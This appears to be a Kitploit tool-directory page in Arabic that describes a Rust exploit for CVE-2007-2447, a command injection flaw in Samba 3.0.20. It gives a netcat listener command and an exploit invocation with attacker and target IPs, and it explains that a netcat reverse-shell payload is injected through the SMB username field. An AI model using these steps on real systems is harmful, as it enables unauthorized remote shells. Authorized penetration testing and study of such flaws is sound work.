Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2007-2447 — تنفيذ مستقل بلغة Rust لاستغلال CVE-2007-2447 الذي يستهدف Samba smbd 3.0.20-Debian. | Kitploit
أدوات/GitHubGitHub/nika0x38/cve-2007-2447
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعدتطوير الحمولات
GitHubnika0x38/cve-2007-2447

CVE-2007-2447

تنفيذ مستقل بلغة Rust لاستغلال CVE-2007-2447 الذي يستهدف Samba smbd 3.0.20-Debian.

عرض المستودع
منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2007-2447 استغلال Samba

Rust Security

تنفيذ مستقل بـ Rust لاستغلال CVE-2007-2447 الذي يستهدف Samba smbd 3.0.20-Debian.

وصف الثغرة

CVE-2007-2447 هي ثغرة حقن أوامر في إصدارات Samba من 3.0.0 إلى 3.0.25rc3. توجد الثغرة في الدالة SamrChangePassword()، التي تفشل في تعقيم إدخال المستخدم بشكل صحيح، مما يسمح للمهاجمين بتنفيذ أوامر عشوائية عبر محارف القشرة (shell metacharacters) في حقل اسم المستخدم أثناء مصادقة SMB.

المتطلبات الأساسية

  • تثبيت Rust على نظامك
  • الهدف يشغّل إصدار Samba المعرّض للثغرة
  • يجب أن يتوفر netcat على الهدف (عادةً ما يكون مثبتًا افتراضيًا)

الاستخدام

root@kitploit:~
cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>

مثال

root@kitploit:~
# Set up a netcat listener
nc -lvnp 4444

# Run the exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100

الخيارات

  • --lhost: عنوان IP لجهازك المهاجم
  • --lport: المنفذ الذي سيستقبل اتصال الصدفة العكسية
  • --target: عنوان IP للجهاز الهدف

كيف يعمل

  1. يولّد حمولة صدفة عكسية عبر netcat مباشرةً في الكود
  2. يحقن الحمولة في حقل اسم مستخدم SMB باستخدام backticks
  3. يرسل طلب SMB Session Setup غير صالح إلى المنفذ 445
  4. يستغل حقن الأوامر في معالجة Samba لاسم المستخدم
  5. ينفّذ حمولة الصدفة العكسية على الهدف

الميزات

  • مستقل: لا يتطلب تبعيات خارجية مثل Metasploit
  • قابل للنقل: يعمل على أي نظام مثبت عليه Rust
  • سريع: لا يستدعي عمليات خارجية

إخلاء مسؤولية

هذه الأداة مخصصة لأغراض تعليمية واختبار الاختراق المصرح به فقط. استخدمها بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح بـ

تنزيل الأداة